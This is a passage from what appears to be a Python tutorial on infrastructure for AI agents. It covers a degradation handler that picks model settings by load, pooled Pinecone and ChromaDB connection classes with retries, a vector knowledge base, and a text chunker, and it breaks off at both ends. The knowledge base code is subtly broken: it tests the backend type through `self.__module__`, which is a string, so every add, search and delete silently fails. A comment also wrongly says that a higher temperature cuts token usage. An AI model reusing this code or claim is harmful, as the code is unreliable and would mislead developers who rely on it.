427 "stream": True
428 }
429
430 if self.current_mode == self.NORMAL:
431 # Normal mode - use best models
432 return {
433 **base_config,
434 "model": "gpt-4-turbo",
435 "max_tokens": 4000
436 }
437
438 elif self.current_mode == self.DEGRADED:
439 # Degraded mode - use more efficient models
440 return {
441 **base_config,
442 "model": "gpt-3.5-turbo",
443 "max_tokens": 2000,
444 "temperature": 0.8 # Higher temp can reduce token usage
445 }
446
447 else: # CRITICAL mode
448 # Critical mode - most restrictive
449 return {
450 **base_config,
451 "model": "gpt-3.5-turbo",
452 "max_tokens": 1000,
453 "temperature": 0.9,
454 "timeout": 30,
455 "stream": False # Disable streaming to reduce connection overhead
456 }
457
458 def should_cache_result(self) -> bool:
459 """Determine if results should be cached based on current mode."""
460 # Always cache in degraded or critical mode
461 return self.current_mode != self.NORMAL
462
463 def should_use_cached_result(self, similarity: float) -> bool:
464 """
465 Determine if cached results should be used based on current mode.
466
467 Args:
468 similarity: Similarity score of cached result (0-1)
469
470 Returns:
471 True if cached result should be used
472 """
473 if self.current_mode == self.NORMAL:
474 # In normal mode, be stricter about cache matching
475 return similarity >= 0.95
476 elif self.current_mode == self.DEGRADED:
477 # In degraded mode, be more lenient
478 return similarity >= 0.85
479 else: # CRITICAL mode
480 # In critical mode, use cache aggressively
481 return similarity >= 0.7
482
483 def get_current_state(self) -> Dict[str, Any]:
484 """Get current state of the handler."""
485 return {
486 "mode": self.current_mode,
487 "resource_usage": self.resource_usage,
488 "degradation_threshold": self.degradation_threshold,
489 "critical_threshold": self.critical_threshold
490 }

Using Vector Databases for Fast Knowledge Retrieval

Vector databases are essential for AI agent systems that need to quickly access and retrieve relevant information. Here's how to implement efficient vector database integration:

1. Setting Up a Vector Database Connection with Improved Error Handling

python
1# vector_storage/connection.py
2import os
3import time
4import logging
5import threading
6from typing import Dict, List, Any, Optional, Union, Tuple
7
8logger = logging.getLogger(__name__)
9
10class VectorDBConnection:
11 """Base class for vector database connections with connection pooling and retry logic."""
12
13 def __init__(self,
14 api_key: str,
15 environment: Optional[str] = None,
16 max_retries: int = 3,
17 retry_delay: float = 1.0,
18 pool_size: int = 5):
19 """
20 Initialize the vector database connection.
21
22 Args:
23 api_key: API key for the vector database
24 environment: Optional environment identifier
25 max_retries: Maximum number of retries for operations
26 retry_delay: Base delay between retries in seconds
27 pool_size: Size of the connection pool
28 """
29 self.api_key = api_key
30 self.environment = environment
31 self.max_retries = max_retries
32 self.retry_delay = retry_delay
33 self.pool_size = pool_size
34
35 # Connection pool and semaphore for limiting concurrent connections
36 self.connection_pool = []
37 self.pool_lock = threading.RLock()
38 self.pool_semaphore = threading.Semaphore(pool_size)
39
40 # Connection status
41 self.is_initialized = False
42 self.last_error = None
43
44 # Metrics
45 self.metrics = {
46 "queries": 0,
47 "successful_queries": 0,
48 "failed_queries": 0,
49 "retries": 0,
50 "avg_query_time": 0,
51 "total_query_time": 0
52 }
53
54 def initialize(self) -> bool:
55 """
56 Initialize the vector database connection.
57
58 Returns:
59 True if initialization succeeded, False otherwise
60 """
61 raise NotImplementedError("Subclasses must implement initialize()")
62
63 def create_connection(self) -> Any:
64 """
65 Create a new connection to the vector database.
66
67 Returns:
68 Connection object
69 """
70 raise NotImplementedError("Subclasses must implement create_connection()")
71
72 def close_connection(self, connection: Any) -> None:
73 """
74 Close a connection to the vector database.
75
76 Args:
77 connection: Connection to close
78 """
79 raise NotImplementedError("Subclasses must implement close_connection()")
80
81 def get_connection(self) -> Any:
82 """
83 Get a connection from the pool or create a new one.
84
85 Returns:
86 Connection object
87 """
88 # Acquire semaphore to limit concurrent connections
89 self.pool_semaphore.acquire()
90
91 try:
92 with self.pool_lock:
93 if self.connection_pool:
94 return self.connection_pool.pop()
95
96 # No connections in the pool, create a new one
97 return self.create_connection()
98
99 except Exception as e:
100 # Release semaphore on error
101 self.pool_semaphore.release()
102 raise
103
104 def release_connection(self, connection: Any) -> None:
105 """
106 Release a connection back to the pool.
107
108 Args:
109 connection: Connection to release
110 """
111 try:
112 with self.pool_lock:
113 self.connection_pool.append(connection)
114 finally:
115 # Always release semaphore
116 self.pool_semaphore.release()
117
118 def close_all_connections(self) -> None:
119 """Close all connections in the pool."""
120 with self.pool_lock:
121 for connection in self.connection_pool:
122 try:
123 self.close_connection(connection)
124 except Exception as e:
125 logger.warning(f"Error closing connection: {e}")
126
127 self.connection_pool = []
128
129 def with_retry(self, operation_func, *args, **kwargs):
130 """
131 Execute an operation with retry logic.
132
133 Args:
134 operation_func: Function to execute
135 *args, **kwargs: Arguments to pass to the function
136
137 Returns:
138 Result of the operation
139
140 Raises:
141 Exception: If all retries fail
142 """
143 last_exception = None
144
145 for attempt in range(self.max_retries):
146 try:
147 # Measure operation time
148 start_time = time.time()
149 result = operation_func(*args, **kwargs)
150 operation_time = time.time() - start_time
151
152 # Update metrics on success
153 self.metrics["queries"] += 1
154 self.metrics["successful_queries"] += 1
155 self.metrics["total_query_time"] += operation_time
156 self.metrics["avg_query_time"] = (
157 self.metrics["total_query_time"] / self.metrics["successful_queries"]
158 )
159
160 return result
161
162 except Exception as e:
163 last_exception = e
164 self.last_error = str(e)
165
166 # Update metrics
167 self.metrics["retries"] += 1
168
169 logger.warning(f"Vector DB operation failed (attempt {attempt+1}/{self.max_retries}): {e}")
170
171 # Exponential backoff
172 if attempt < self.max_retries - 1:
173 delay = self.retry_delay * (2 ** attempt)
174 time.sleep(delay)
175
176 # All retries failed
177 self.metrics["queries"] += 1
178 self.metrics["failed_queries"] += 1
179
180 # Re-raise the last exception
181 raise last_exception
182
183 def get_metrics(self) -> Dict[str, Any]:
184 """
185 Get connection metrics.
186
187 Returns:
188 Dictionary of metrics
189 """
190 with self.pool_lock:
191 metrics = self.metrics.copy()
192 metrics["pool_size"] = len(self.connection_pool)
193 metrics["is_initialized"] = self.is_initialized
194 metrics["last_error"] = self.last_error
195 return metrics
196
197class PineconeConnection(VectorDBConnection):
198 """Pinecone vector database connection implementation."""
199
200 def __init__(self,
201 api_key: str,
202 environment: str,
203 project_id: Optional[str] = None,
204 **kwargs):
205 """
206 Initialize Pinecone connection.
207
208 Args:
209 api_key: Pinecone API key
210 environment: Pinecone environment
211 project_id: Optional Pinecone project ID
212 **kwargs: Additional arguments for VectorDBConnection
213 """
214 super().__init__(api_key, environment, **kwargs)
215 self.project_id = project_id
216 self.indexes = {} # Cache for index connections
217
218 def initialize(self) -> bool:
219 """
220 Initialize the Pinecone client.
221
222 Returns:
223 True if initialization succeeded
224 """
225 try:
226 import pinecone
227
228 # Initialize Pinecone
229 pinecone.init(
230 api_key=self.api_key,
231 environment=self.environment
232 )
233
234 self.is_initialized = True
235 return True
236
237 except Exception as e:
238 logger.error(f"Failed to initialize Pinecone: {e}")
239 self.last_error = str(e)
240 self.is_initialized = False
241 return False
242
243 def create_connection(self) -> Any:
244 """
245 Create a new connection to Pinecone.
246
247 Returns:
248 Pinecone client
249 """
250 import pinecone
251
252 if not self.is_initialized:
253 self.initialize()
254
255 # Pinecone doesn't have a dedicated connection object
256 # We'll just return the module for now
257 return pinecone
258
259 def close_connection(self, connection: Any) -> None:
260 """
261 Close connection to Pinecone.
262
263 Args:
264 connection: Pinecone connection
265 """
266 # Pinecone doesn't require explicit connection closing
267 pass
268
269 def get_index(self, index_name: str) -> Any:
270 """
271 Get a Pinecone index.
272
273 Args:
274 index_name: Name of the index
275
276 Returns:
277 Pinecone index object
278 """
279 import pinecone
280
281 # Check if index is cached
282 if index_name in self.indexes:
283 return self.indexes[index_name]
284
285 # Get connection
286 connection = self.get_connection()
287
288 try:
289 # Get the index
290 index = connection.Index(index_name)
291
292 # Cache the index
293 self.indexes[index_name] = index
294
295 return index
296
297 finally:
298 # Release connection
299 self.release_connection(connection)
300
301 def query(self,
302 index_name: str,
303 vector: List[float],
304 top_k: int = 10,
305 include_metadata: bool = True,
306 include_values: bool = False,
307 namespace: str = "",
308 filter: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
309 """
310 Query a Pinecone index.
311
312 Args:
313 index_name: Name of the index
314 vector: Query vector
315 top_k: Number of results to return
316 include_metadata: Whether to include metadata
317 include_values: Whether to include vector values
318 namespace: Optional namespace
319 filter: Optional filter
320
321 Returns:
322 Query results
323 """
324 def _do_query():
325 index = self.get_index(index_name)
326
327 return index.query(
328 vector=vector,
329 top_k=top_k,
330 include_metadata=include_metadata,
331 include_values=include_values,
332 namespace=namespace,
333 filter=filter
334 )
335
336 return self.with_retry(_do_query)
337
338 def upsert(self,
339 index_name: str,
340 vectors: List[Tuple[str, List[float], Dict[str, Any]]],
341 namespace: str = "") -> Dict[str, Any]:
342 """
343 Upsert vectors to a Pinecone index.
344
345 Args:
346 index_name: Name of the index
347 vectors: List of (id, vector, metadata) tuples
348 namespace: Optional namespace
349
350 Returns:
351 Upsert response
352 """
353 def _do_upsert():
354 index = self.get_index(index_name)
355
356 # Format vectors for Pinecone
357 formatted_vectors = [
358 (id, vector, metadata)
359 for id, vector, metadata in vectors
360 ]
361
362 return index.upsert(
363 vectors=formatted_vectors,
364 namespace=namespace
365 )
366
367 return self.with_retry(_do_upsert)
368
369 def delete(self,
370 index_name: str,
371 ids: Optional[List[str]] = None,
372 delete_all: bool = False,
373 namespace: str = "",
374 filter: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
375 """
376 Delete vectors from a Pinecone index.
377
378 Args:
379 index_name: Name of the index
380 ids: List of vector IDs to delete
381 delete_all: Whether to delete all vectors
382 namespace: Optional namespace
383 filter: Optional filter
384
385 Returns:
386 Delete response
387 """
388 def _do_delete():
389 index = self.get_index(index_name)
390
391 if delete_all:
392 return index.delete(delete_all=True, namespace=namespace)
393 elif filter:
394 return index.delete(filter=filter, namespace=namespace)
395 else:
396 return index.delete(ids=ids, namespace=namespace)
397
398 return self.with_retry(_do_delete)
399
400 def list_indexes(self) -> List[str]:
401 """
402 List all Pinecone indexes.
403
404 Returns:
405 List of index names
406 """
407 def _do_list():
408 connection = self.get_connection()
409 try:
410 return connection.list_indexes()
411 finally:
412 self.release_connection(connection)
413
414 return self.with_retry(_do_list)
415
416 def create_index(self,
417 name: str,
418 dimension: int,
419 metric: str = "cosine",
420 pods: int = 1,
421 replicas: int = 1,
422 pod_type: str = "p1.x1") -> bool:
423 """
424 Create a new Pinecone index.
425
426 Args:
427 name: Index name
428 dimension: Vector dimension
429 metric: Distance metric
430 pods: Number of pods
431 replicas: Number of replicas
432 pod_type: Pod type
433
434 Returns:
435 True if index was created
436 """
437 def _do_create():
438 connection = self.get_connection()
439 try:
440 connection.create_index(
441 name=name,
442 dimension=dimension,
443 metric=metric,
444 pods=pods,
445 replicas=replicas,
446 pod_type=pod_type
447 )
448 return True
449 finally:
450 self.release_connection(connection)
451
452 return self.with_retry(_do_create)
453
454 def delete_index(self, name: str) -> bool:
455 """
456 Delete a Pinecone index.
457
458 Args:
459 name: Index name
460
461 Returns:
462 True if index was deleted
463 """
464 def _do_delete():
465 connection = self.get_connection()
466 try:
467 connection.delete_index(name)
468
469 # Remove from index cache
470 if name in self.indexes:
471 del self.indexes[name]
472
473 return True
474 finally:
475 self.release_connection(connection)
476
477 return self.with_retry(_do_delete)
478
479class ChromaDBConnection(VectorDBConnection):
480 """ChromaDB vector database connection implementation."""
481
482 def __init__(self,
483 host: Optional[str] = None,
484 port: Optional[int] = None,
485 ssl: bool = False,
486 headers: Optional[Dict[str, str]] = None,
487 persistent_dir: Optional[str] = None,
488 **kwargs):
489 """
490 Initialize ChromaDB connection.
491
492 Args:
493 host: ChromaDB host for HTTP client
494 port: ChromaDB port for HTTP client
495 ssl: Whether to use SSL
496 headers: Optional headers for HTTP client
497 persistent_dir: Directory for local persistence
498 **kwargs: Additional arguments for VectorDBConnection
499 """
500 # ChromaDB doesn't use API key or environment in the same way
501 super().__init__(api_key="", **kwargs)
502
503 self.host = host
504 self.port = port
505 self.ssl = ssl
506 self.headers = headers
507 self.persistent_dir = persistent_dir
508 self.client_type = "http" if host else "persistent"
509
510 # Cache for collection connections
511 self.collections = {}
512
513 def initialize(self) -> bool:
514 """
515 Initialize the ChromaDB client.
516
517 Returns:
518 True if initialization succeeded
519 """
520 try:
521 import chromadb
522
523 # Initialize connection based on configuration
524 if self.client_type == "http":
525 self._client_args = {
526 "host": self.host,
527 "port": self.port,
528 "ssl": self.ssl,
529 "headers": self.headers
530 }
531 else:
532 self._client_args = {
533 "path": self.persistent_dir
534 }
535
536 # Test connection
537 client = self.create_connection()
538 heartbeat = client.heartbeat()
539
540 self.is_initialized = True
541 return True
542
543 except Exception as e:
544 logger.error(f"Failed to initialize ChromaDB: {e}")
545 self.last_error = str(e)
546 self.is_initialized = False
547 return False
548
549 def create_connection(self) -> Any:
550 """
551 Create a new connection to ChromaDB.
552
553 Returns:
554 ChromaDB client
555 """
556 import chromadb
557
558 if not self.is_initialized:
559 self.initialize()
560
561 # Create client based on client type
562 if self.client_type == "http":
563 return chromadb.HttpClient(**self._client_args)
564 else:
565 return chromadb.PersistentClient(**self._client_args)
566
567 def close_connection(self, connection: Any) -> None:
568 """
569 Close connection to ChromaDB.
570
571 Args:
572 connection: ChromaDB connection
573 """
574 # No explicit closing needed for ChromaDB
575 pass
576
577 def get_collection(self,
578 name: str,
579 embedding_function: Optional[Any] = None,
580 create_if_missing: bool = True) -> Any:
581 """
582 Get a ChromaDB collection.
583
584 Args:
585 name: Collection name
586 embedding_function: Optional embedding function
587 create_if_missing: Whether to create collection if it doesn't exist
588
589 Returns:
590 ChromaDB collection
591 """
592 # Check if collection is cached
593 collection_key = f"{name}_{id(embedding_function)}"
594 if collection_key in self.collections:
595 return self.collections[collection_key]
596
597 # Get connection
598 client = self.get_connection()
599
600 try:
601 # Try to get collection
602 try:
603 collection = client.get_collection(
604 name=name,
605 embedding_function=embedding_function
606 )
607 except Exception as e:
608 # Collection doesn't exist
609 if create_if_missing:
610 collection = client.create_collection(
611 name=name,
612 embedding_function=embedding_function
613 )
614 else:
615 raise
616
617 # Cache the collection
618 self.collections[collection_key] = collection
619
620 return collection
621
622 finally:
623 # Release connection
624 self.release_connection(client)
625
626 def query(self,
627 collection_name: str,
628 query_texts: Optional[List[str]] = None,
629 query_embeddings: Optional[List[List[float]]] = None,
630 n_results: int = 10,
631 where: Optional[Dict[str, Any]] = None,
632 embedding_function: Optional[Any] = None) -> Dict[str, Any]:
633 """
634 Query a ChromaDB collection.
635
636 Args:
637 collection_name: Collection name
638 query_texts: Query texts
639 query_embeddings: Query embeddings
640 n_results: Number of results to return
641 where: Optional filter
642 embedding_function: Optional embedding function
643
644 Returns:
645 Query results
646 """
647 def _do_query():
648 collection = self.get_collection(
649 collection_name,
650 embedding_function,
651 create_if_missing=False
652 )
653
654 return collection.query(
655 query_texts=query_texts,
656 query_embeddings=query_embeddings,
657 n_results=n_results,
658 where=where
659 )
660
661 return self.with_retry(_do_query)
662
663 def add_documents(self,
664 collection_name: str,
665 documents: List[str],
666 metadatas: Optional[List[Dict[str, Any]]] = None,
667 ids: Optional[List[str]] = None,
668 embedding_function: Optional[Any] = None) -> Dict[str, Any]:
669 """
670 Add documents to a ChromaDB collection.
671
672 Args:
673 collection_name: Collection name
674 documents: Documents to add
675 metadatas: Optional metadata for each document
676 ids: Optional IDs for each document
677 embedding_function: Optional embedding function
678
679 Returns:
680 Add response
681 """
682 def _do_add():
683 collection = self.get_collection(
684 collection_name,
685 embedding_function,
686 create_if_missing=True
687 )
688
689 return collection.add(
690 documents=documents,
691 metadatas=metadatas,
692 ids=ids
693 )
694
695 return self.with_retry(_do_add)
696
697 def delete(self,
698 collection_name: str,
699 ids: Optional[List[str]] = None,
700 where: Optional[Dict[str, Any]] = None,
701 embedding_function: Optional[Any] = None) -> Dict[str, Any]:
702 """
703 Delete documents from a ChromaDB collection.
704
705 Args:
706 collection_name: Collection name
707 ids: Optional IDs to delete
708 where: Optional filter
709 embedding_function: Optional embedding function
710
711 Returns:
712 Delete response
713 """
714 def _do_delete():
715 collection = self.get_collection(
716 collection_name,
717 embedding_function,
718 create_if_missing=False
719 )
720
721 return collection.delete(
722 ids=ids,
723 where=where
724 )
725
726 return self.with_retry(_do_delete)
727
728 def list_collections(self) -> List[str]:
729 """
730 List all ChromaDB collections.
731
732 Returns:
733 List of collection names
734 """
735 def _do_list():
736 client = self.get_connection()
737 try:
738 collections = client.list_collections()
739 return [collection.name for collection in collections]
740 finally:
741 self.release_connection(client)
742
743 return self.with_retry(_do_list)
744
745 def delete_collection(self, name: str) -> bool:
746 """
747 Delete a ChromaDB collection.
748
749 Args:
750 name: Collection name
751
752 Returns:
753 True if collection was deleted
754 """
755 def _do_delete():
756 client = self.get_connection()
757 try:
758 client.delete_collection(name)
759
760 # Remove from collection cache
761 for key in list(self.collections.keys()):
762 if key.startswith(f"{name}_"):
763 del self.collections[key]
764
765 return True
766 finally:
767 self.release_connection(client)
768
769 return self.with_retry(_do_delete)

2. Knowledge Base Implementation with Vector Database

python
1# vector_storage/knowledge_base.py
2import os
3import json
4import time
5import hashlib
6import logging
7from typing import Dict, List, Any, Optional, Union, Tuple
8from dataclasses import dataclass, field
9
10from .connection import VectorDBConnection
11
12logger = logging.getLogger(__name__)
13
14@dataclass
15class Document:
16 """Document for storage in knowledge base."""
17 id: str
18 content: str
19 metadata: Dict[str, Any] = field(default_factory=dict)
20 embedding: Optional[List[float]] = None
21 score: float = 0.0
22
23class KnowledgeBase:
24 """
25 Knowledge base for storing and retrieving documents using vector embeddings.
26 """
27
28 def __init__(self,
29 vector_db: VectorDBConnection,
30 embedding_function: callable,
31 collection_name: str,
32 dimension: int = 1536):
33 """
34 Initialize the knowledge base.
35
36 Args:
37 vector_db: Vector database connection
38 embedding_function: Function to convert text to embeddings
39 collection_name: Name of the collection/index
40 dimension: Dimension of the embeddings
41 """
42 self.vector_db = vector_db
43 self.embedding_function = embedding_function
44 self.collection_name = collection_name
45 self.dimension = dimension
46
47 self.ensure_collection_exists()
48
49 def ensure_collection_exists(self) -> bool:
50 """
51 Ensure the collection/index exists in the vector database.
52
53 Returns:
54 True if collection exists or was created
55 """
56 # Implementation depends on specific vector database
57 try:
58 if isinstance(self.vector_db, self.__module__.PineconeConnection):
59 # Check if index exists
60 indexes = self.vector_db.list_indexes()
61
62 if self.collection_name not in indexes:
63 # Create index
64 self.vector_db.create_index(
65 name=self.collection_name,
66 dimension=self.dimension,
67 metric="cosine"
68 )
69
70 return True
71
72 elif isinstance(self.vector_db, self.__module__.ChromaDBConnection):
73 # ChromaDB will create collection if it doesn't exist
74 self.vector_db.get_collection(
75 name=self.collection_name,
76 embedding_function=self.embedding_function,
77 create_if_missing=True
78 )
79
80 return True
81
82 else:
83 logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
84 return False
85
86 except Exception as e:
87 logger.error(f"Error ensuring collection exists: {e}")
88 return False
89
90 def get_embedding(self, text: str) -> List[float]:
91 """
92 Get embedding for text.
93
94 Args:
95 text: Text to embed
96
97 Returns:
98 Embedding vector
99 """
100 try:
101 return self.embedding_function(text)
102 except Exception as e:
103 logger.error(f"Error getting embedding: {e}")
104 raise
105
106 def add_document(self, document: Document) -> bool:
107 """
108 Add a document to the knowledge base.
109
110 Args:
111 document: Document to add
112
113 Returns:
114 True if document was added successfully
115 """
116 try:
117 # Generate embedding if not provided
118 if document.embedding is None:
119 document.embedding = self.get_embedding(document.content)
120
121 # Add to vector database
122 if isinstance(self.vector_db, self.__module__.PineconeConnection):
123 self.vector_db.upsert(
124 index_name=self.collection_name,
125 vectors=[(document.id, document.embedding, document.metadata)],
126 namespace=""
127 )
128
129 elif isinstance(self.vector_db, self.__module__.ChromaDBConnection):
130 self.vector_db.add_documents(
131 collection_name=self.collection_name,
132 documents=[document.content],
133 metadatas=[document.metadata],
134 ids=[document.id],
135 embedding_function=None # Don't use collection's embedding function
136 )
137
138 else:
139 logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
140 return False
141
142 return True
143
144 except Exception as e:
145 logger.error(f"Error adding document: {e}")
146 return False
147
148 def add_documents(self, documents: List[Document]) -> Tuple[bool, int]:
149 """
150 Add multiple documents to the knowledge base.
151
152 Args:
153 documents: Documents to add
154
155 Returns:
156 Tuple of (success, number of documents added)
157 """
158 try:
159 # Generate embeddings for documents without them
160 for doc in documents:
161 if doc.embedding is None:
162 doc.embedding = self.get_embedding(doc.content)
163
164 # Add to vector database
165 if isinstance(self.vector_db, self.__module__.PineconeConnection):
166 vectors = [
167 (doc.id, doc.embedding, doc.metadata)
168 for doc in documents
169 ]
170
171 self.vector_db.upsert(
172 index_name=self.collection_name,
173 vectors=vectors,
174 namespace=""
175 )
176
177 elif isinstance(self.vector_db, self.__module__.ChromaDBConnection):
178 self.vector_db.add_documents(
179 collection_name=self.collection_name,
180 documents=[doc.content for doc in documents],
181 metadatas=[doc.metadata for doc in documents],
182 ids=[doc.id for doc in documents],
183 embedding_function=None
184 )
185
186 else:
187 logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
188 return False, 0
189
190 return True, len(documents)
191
192 except Exception as e:
193 logger.error(f"Error adding documents: {e}")
194 return False, 0
195
196 def delete_document(self, document_id: str) -> bool:
197 """
198 Delete a document from the knowledge base.
199
200 Args:
201 document_id: ID of document to delete
202
203 Returns:
204 True if document was deleted successfully
205 """
206 try:
207 # Delete from vector database
208 if isinstance(self.vector_db, self.__module__.PineconeConnection):
209 self.vector_db.delete(
210 index_name=self.collection_name,
211 ids=[document_id],
212 namespace=""
213 )
214
215 elif isinstance(self.vector_db, self.__module__.ChromaDBConnection):
216 self.vector_db.delete(
217 collection_name=self.collection_name,
218 ids=[document_id]
219 )
220
221 else:
222 logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
223 return False
224
225 return True
226
227 except Exception as e:
228 logger.error(f"Error deleting document: {e}")
229 return False
230
231 def search(self,
232 query: str,
233 top_k: int = 5,
234 threshold: float = 0.0,
235 filter: Optional[Dict[str, Any]] = None) -> List[Document]:
236 """
237 Search for documents similar to the query.
238
239 Args:
240 query: Query string
241 top_k: Number of results to return
242 threshold: Minimum similarity threshold
243 filter: Optional filter for metadata
244
245 Returns:
246 List of matching documents
247 """
248 try:
249 # Get query embedding
250 query_embedding = self.get_embedding(query)
251
252 # Search vector database
253 if isinstance(self.vector_db, self.__module__.PineconeConnection):
254 response = self.vector_db.query(
255 index_name=self.collection_name,
256 vector=query_embedding,
257 top_k=top_k,
258 include_metadata=True,
259 filter=filter
260 )
261
262 # Convert response to documents
263 documents = []
264 for match in response.get("matches", []):
265 if match.get("score", 0) >= threshold:
266 doc = Document(
267 id=match.get("id", ""),
268 content=match.get("metadata", {}).get("text", ""),
269 metadata=match.get("metadata", {}),
270 score=match.get("score", 0)
271 )
272 documents.append(doc)
273
274 return documents
275
276 elif isinstance(self.vector_db, self.__module__.ChromaDBConnection):
277 response = self.vector_db.query(
278 collection_name=self.collection_name,
279 query_embeddings=[query_embedding],
280 n_results=top_k,
281 where=filter
282 )
283
284 # Convert response to documents
285 documents = []
286
287 ids = response.get("ids", [[]])[0]
288 distances = response.get("distances", [[]])[0]
289 metadatas = response.get("metadatas", [[]])[0]
290 documents_content = response.get("documents", [[]])[0]
291
292 for i in range(len(ids)):
293 # Convert distance to similarity score (ChromaDB returns distances)
294 score = 1.0 - distances[i]
295
296 if score >= threshold:
297 doc = Document(
298 id=ids[i],
299 content=documents_content[i],
300 metadata=metadatas[i] if metadatas else {},
301 score=score
302 )
303 documents.append(doc)
304
305 return documents
306
307 else:
308 logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
309 return []
310
311 except Exception as e:
312 logger.error(f"Error searching documents: {e}")
313 return []
314
315 def update_document(self, document: Document) -> bool:
316 """
317 Update a document in the knowledge base.
318
319 Args:
320 document: Updated document
321
322 Returns:
323 True if document was updated successfully
324 """
325 # For most vector databases, this is the same as adding
326 return self.add_document(document)
327
328 def get_document_by_id(self, document_id: str) -> Optional[Document]:
329 """
330 Get a document by ID.
331
332 Args:
333 document_id: Document ID
334
335 Returns:
336 Document if found, None otherwise
337 """
338 try:
339 # Implementation depends on specific vector database
340 if isinstance(self.vector_db, self.__module__.PineconeConnection):
341 # Not directly supported by Pinecone API, but we can fetch the vector
342 # and metadata for a specific ID
343 # This would require direct access to the specific index
344 index = self.vector_db.get_index(self.collection_name)
345 response = index.fetch(ids=[document_id])
346
347 if document_id in response.get("vectors", {}):
348 vector_data = response["vectors"][document_id]
349
350 return Document(
351 id=document_id,
352 content=vector_data.get("metadata", {}).get("text", ""),
353 metadata=vector_data.get("metadata", {}),
354 embedding=vector_data.get("values"),
355 score=1.0 # Not a search result, so score not applicable
356 )
357
358 return None
359
360 elif isinstance(self.vector_db, self.__module__.ChromaDBConnection):
361 # Get collection
362 collection = self.vector_db.get_collection(
363 name=self.collection_name,
364 embedding_function=self.embedding_function,
365 create_if_missing=False
366 )
367
368 # Get document by ID
369 response = collection.get(ids=[document_id])
370
371 if response.get("ids") and len(response["ids"]) > 0:
372 return Document(
373 id=response["ids"][0],
374 content=response.get("documents", [""])[0],
375 metadata=response.get("metadatas", [{}])[0] if response.get("metadatas") else {},
376 embedding=response.get("embeddings", [None])[0] if response.get("embeddings") else None,
377 score=1.0 # Not a search result
378 )
379
380 return None
381
382 else:
383 logger.warning(f"Unsupported vector database type: {type(self.vector_db)}")
384 return None
385
386 except Exception as e:
387 logger.error(f"Error getting document by ID: {e}")
388 return None

3. Text Chunking and Processing for Knowledge Base

python
1# vector_storage/text_processing.py
2import re
3import hashlib
4import logging
5from typing import List, Dict, Any, Optional, Tuple
6
7logger = logging.getLogger(__name__)
8
9class TextChunker:
10 """
11 Splits text into chunks for storage in a vector database.
12 """
13
14 def __init__(self,
15 chunk_size: int = 1000,
16 chunk_overlap: int = 200,
17 tokenizer: Optional[callable] = None):
18 """
19 Initialize the text chunker.
20
21 Args:
22 chunk_size: Target size of chunks in characters
23 chunk_overlap: Overlap between chunks in characters
24 tokenizer: Optional tokenizer function
25 """
26 self.chunk_size = chunk_size
27 self.chunk_overlap = chunk_overlap
28 self.tokenizer = tokenizer or self._default_tokenizer
29
30 def _default_tokenizer(self, text: str) -> List[str]:
31 """
32 Simple whitespace tokenizer.
33
34 Args:
35 text: Text to tokenize
36
37 Returns:
38 List of tokens
39 """
40 return text.split()
41
42 def split_text(self, text: str) -> List[str]:
43 """
44 Split text into chunks.
45
46 Args:
47 text: Text to split
48
49 Returns:
50 List of text chunks
51 """
52 # Basic preprocessing
53 text = text.strip()
54
55 # Check if text is short enough for a single chunk
56 if len(text) <= self.chunk_size:
57 return [text]
58
59 chunks = []
60 start = 0
61
62 while start < len(text):
63 # Calculate end position
64 end = start + self.chunk_size
65
66 # Adjust if we're not at the end of the text
67 if end < len(text):
68 # Try to find a sentence boundary
69 sentence_end = self._find_sentence_boundary(text, end)
70 if sentence_end != -1:
71 end = sentence_end
72 else:
73 # Try to find a word boundary
74 word_end = self._find_word_boundary(text, end)
75 if word_end != -1:
76 end = word_end
77 else:
78 end = len(text)
79
80 # Add the chunk
81 chunks.append(text[start:end])
82
83 # Calculate next start position
84 start = end - self.chunk_overlap
85
86 # Ensure progress
87 if start >= end:
88 start = end
89
90 # If we're at the end, stop
91 if start >= len(text):
92 break
93
94 return chunks
95
96 def _find_sentence_boundary(self, text: str, position: int) -> int:
97 """
98 Find the nearest sentence boundary before the position.
99
100 Args:
101 text: Text to search
102 position: Position to search from
103
104 Returns:
105 Position of sentence boundary, or -1 if not found
106 """
107 sentence_end_pattern = r'[.!?]\s+'
108
109 # Search for sentence boundaries in a window before the position
110 search_start = max(0, position - 100)
111 search_text = text[search_start:position]
112
113 matches = list(re.finditer(sentence_end_pattern, search_text))
114 if matches:
115 last_match = matches[-1]
116 return search_start + last_match.end()
117
118 return -1
119
120 def _find_word_boundary(self, text: str, position: int) -> int:
121 """
122 Find the nearest word boundary before the position.
123
124 Args:
125 text: Text to search
126 position: Position to search from
127
128 Returns:
129 Position of word boundary, or -1 if not found
130 """
131 # Search for space characters in a window before the position
132 search_start = max(0, position - 50)
133 search_text = text[search_start:position]
134
135 matches = list(re.finditer(r'\s+', search_text))
136 if matches:
137 last_match = matches[-1]
138 return search_start + last_match.end()
139
140 return -1
141
142 def get_text_chunks_with_metadata(self,
143 text: str,
144 metadata: Dict[str, Any],
145 document_id: Optional[str] = None) -> List[Tuple[str, Dict[str, Any], str]]:
146 """
147 Split text into chunks and prepare for vector database storage.
148
149 Args:
150 text: Text to split
151 metadata: Base metadata for the document
152 document_id: Optional document ID prefix
153
154 Returns:
155 List of (chunk, metadata, id) tuples
156 """
157 chunks = self.split_text(text)
158 results = []
159
160 for i, chunk in enumerate(chunks):
161 # Create chunk ID
162 if document_id:
163 chunk_id = f"{document_id}_chunk_{i}"
164 else:
165 # Create a hash-based ID if none provided
166 chunk_hash = hashlib.md5(chunk.encode()).hexdigest()
167 chunk_id = f"chunk_{chunk_hash}"
168
169 # Create chunk metadata
170 chunk_metadata = metadata.copy()
171 chunk_metadata.update({
172 "chunk_index": i,
173 "chunk_count": len(chunks),
174 "is_first_chunk": i == 0,
175 "is_last_chunk": i == len(chunks) - 1,
176 "text_length": len(chunk)
177 })
178
179 results.append((chunk, chunk_metadata, chunk_id))
180
181 return results
182
183class TextProcessor:
184 """
185 Processes text for better retrieval in vector databases.
186 """
187
188 def __init__(self,
189 chunker: TextChunker,
190 clean_html: bool = True,
191 normalize_whitespace: bool = True,
192 strip_markdown: bool = True):
193 """
194 Initialize the text processor.
195
196 Args:
197 chunker: TextChunker instance for splitting text
198 clean_html: Whether to remove HTML tags
199 normalize_whitespace: Whether to normalize whitespace
200 strip_markdown: Whether to remove Markdown formatting
201 """
202 self.chunker = chunker
203 self.clean_html = clean_html
